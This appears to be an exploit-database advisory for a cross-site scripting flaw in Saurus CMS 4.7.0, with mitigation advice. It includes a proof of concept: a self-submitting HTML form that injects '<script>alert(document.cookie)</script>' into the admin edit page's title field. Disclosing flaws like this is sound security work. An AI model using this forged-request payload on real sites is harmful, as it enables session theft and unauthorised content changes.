Cross-Site Scripting Vulnerability in Saurus CMS

vendor:

Saurus CMS

by:

5.5

CVSS

MEDIUM

Cross-Site Scripting

CWE

Product Name: Saurus CMS

Affected Version From: 4.7.0 Community Edition

Affected Version To:

Patch Exists: NO

Related CWE:

CPE: saurus_cms

Metasploit:

Other Scripts:

Platforms Tested:

Cross-Site Scripting Vulnerability in Saurus CMS

The Saurus CMS application fails to sanitize user-supplied input, leading to a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of a user on the affected site, potentially stealing authentication credentials and launching other attacks.

Mitigation:

Sanitize user-supplied input to prevent the execution of arbitrary script code. Use appropriate input validation and output encoding techniques.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40059/info

Saurus CMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Saurus CMS 4.7.0 Community Edition is vulnerable; other versions may also be affected. 

<form action="http://www.example.com/admin/edit.php" name="editForm" method="POST" enctype="multipart/form-data">
<input type="hidden" name="tab" value="object" />
<input type="hidden" name="op" value="new" />
<input type="hidden" name="op2" value="" />
<input type="hidden" name="refresh" value="0" />
<input type="hidden" name="tyyp_id" value="1" />
<input type="hidden" name="tyyp" value="rubriik" />
<input type="hidden" name="pearubriik" value="0" />
<input type="hidden" name="id" value="27746" />
<input type="hidden" name="parent_id" value="27270" />
<input type="hidden" name="previous_id" value="" />
<input type="hidden" name="keel" value="1" />
<input type="hidden" name="on_pealkiri" value="1" />
<input type="hidden" name="sorting" value="">
<input type="hidden" name="extension_path" value="" />
<input type="hidden" name="opener_location" value="" />
<input type="hidden" name="publish" value="1" />
<input name="permanent_parent_id" type="hidden" value="27270" />
<input name="sys_alias" type="hidden" value="" />
<input name="advanced_panel_state" type="hidden" value="0" />
<input type="hidden" name="pealkiri" value='"><script>alert(document.cookie)</script>' />
<input type="hidden" name="friendly_url" value="scriptalertdocumentcookiescript" />
<input type="hidden" name="ttyyp_id" value="0" />
<input type="hidden" name="publish" value="1" />
<input type="hidden" name="rubriik[]" value="27270">
<input type="hidden" name="page_ttyyp_id" value="0" />
<input type="hidden" name="on_meilinglist" value="1" />
<input type="hidden" name="avaldamise_algus" value="" />
<input type="hidden" name="avaldamise_lopp" value="" />
<input type="hidden" name="kesk" value="0" />
</form>
<script>
document.editForm.submit();
</script>